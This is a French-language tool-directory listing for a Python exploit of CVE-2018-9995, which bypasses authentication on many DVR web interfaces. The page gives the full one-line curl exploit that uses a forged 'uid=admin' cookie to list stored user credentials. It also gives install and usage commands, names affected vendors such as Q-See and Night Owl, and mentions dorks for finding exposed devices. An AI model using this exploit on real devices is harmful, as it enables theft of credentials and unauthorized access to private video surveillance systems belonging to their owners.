Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-9995_dvr_credentials — Exploit Python pour CVE-2018-9995 qui récupère les identifiants DVR exposés en contournant l'authentification sur les interfaces web vulnérables. | Kitploit
Outils/GitHubGitHub/abizchi/cve-2018-9995_dvr_credentials
Sécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubabizchi/cve-2018-9995_dvr_credentials

CVE-2018-9995_dvr_credentials

Exploit Python pour CVE-2018-9995 qui récupère les identifiants DVR exposés en contournant l'authentification sur les interfaces web vulnérables.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
10il y a 7 ansPas encore vérifié

[Outil] affiche les identifiants DVR

[*] Titre de l'exploit :       "Obtient les identifiants DVR"
[*] CVE :                 CVE-2018-9995
[*] Score de base CVSS v3 :  7,3 / 10
[*] Chaîne vectorielle CVSS :  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] Date :                09/04/2018
[*] Auteur de l'exploit :      Fernandez Ezequiel ( twitter:@capitan_alfa )

DVR_wall

Exploit :

	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

testé sur DVR (bannière/fournisseur ?) :

Novo
CeNova
QSee
Pulnix
XVR 5 en 1 (titre : "XVR Login")
Securus,  - Sécurité. Ne jamais compromettre !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

Dans la nature :

DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

Bannières possibles du frontend (web) :

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

Intérieur :

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

OUTIL : "Affiche tous les identifiants DVR"

Démarrage rapide

usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt

aide

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

[+] Démo : python getDVR_Credentials.py --host 192.168.1.101 -p 81

Preuves de concept (Sortie) :

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

Blog :

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html

Je te vois... ! xd

Télécharger l’outil